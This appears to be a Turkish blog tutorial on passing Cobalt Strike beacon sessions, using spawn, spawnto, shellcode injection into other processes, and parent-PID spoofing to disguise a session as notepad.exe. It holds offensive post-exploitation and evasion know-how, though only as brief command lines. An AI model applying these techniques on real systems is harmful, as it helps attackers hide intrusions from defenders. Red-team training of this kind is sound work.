Session passing güzel konulardan bir tanesidir , oturum geçişi olarak bilinir türkçesi , aslında adında da anlaşılıyor biz ne yapacağız burda birkaç komut kullanarak elimizde elde ettiğimiz beacon sessionunu yine elimizde bulunan bir session için geçişini nasıl sağlayacağınız ona bakalım ...


Komutlar :

spawn:

  1. spawn x86 DotnetGuardListenerHTTP
  2. spawn DotnetGuardListenerHTTP

Spawn’nın türkçesi doğurmak demek yani abi biz sana bir listener ve architecture verdiğimizde bizim için bir tane session doğur.

Default olarak bize rundll32.exe doğuracak.Bunu da şöyle düşünün bizim ilk sessionumuz rundll32.exe (PID=6040) olsun ve biz buna spawn komutunu verdiğimizde bu direkt olarak kendi altında rundll32.exe isimli bir tane daha executable file oluşturacak yani bize bir tane daha session doğuracak örneğe bakalım.



Peki hocam başka bir exe altına nasıl doğurma işlemi yapacaz bunu da yapabilmek için : öncelikle elimizde bulunan .exe’yi spawnto ile başka bir exe’ye spawn ettirip daha sonra spawn operasyonunu başlatıyoruz yani şöyle düşünelim.c:\windows\system32\notepad.exe var bunu biliyoruz ve ben bir tane notepad.exe içerisine spawnto ile kendi shellcodumu inject edip bunu çalıştırmak istiyorum.Bakalım nasıl yapcaz bunu ?

beacon> spawnto -> spawnto [notepad.exe locationunu yazacağız. ]

beacon> spawnto c:\windows\system32\notepad.exe

beacon> spawn x64 [Listener]




Görüldüğü üzere bir tane notepad.exe çalıştı.

inject: bu komut sayesinde elimizde bulunan

Beacon payloadı sayesinde başka bir process’i açıp shellcode gömebiliriz.


Görüldüğü üzere herhangi bir değişiklik yok process’in içerisine shellcodumuzu gömüp çalıştırdık.



Şimdi bir de ppid komutunu kullanalım güzel bir komuttur kendisi , process parent id demek , siz eğer ki bir process spawn ediyorsunuz doğurtmak istiyorsunuz diyelim, öncelikle yapmanız gereken oluşturacağınız process’in ppid değerini belirleyip daha sonra isterseniz eğer spawnto komutu kullanarak hangi uygulamayı kullanmak istiyorsunuz örneğin biz notepad.exe’yi kullanmak istiyoruz bununla birlikte ppid’miz processhacker.exe’nin pid’si yapıp daha sonra spawn ile process’imizi doğuruyoruz bakalım birlikte ne oluyor.




Spawnto’dan kalan komutumuz notepad.exe olduğu için artık oluşturduğumuzda sanki notepad.exe çalışıyormuş gibi bir hissiyat vericek.Tabi notepad.exe internete çıkmadığı için bilgili defanstaki arkadaşlar hemen önlem alacaklardır.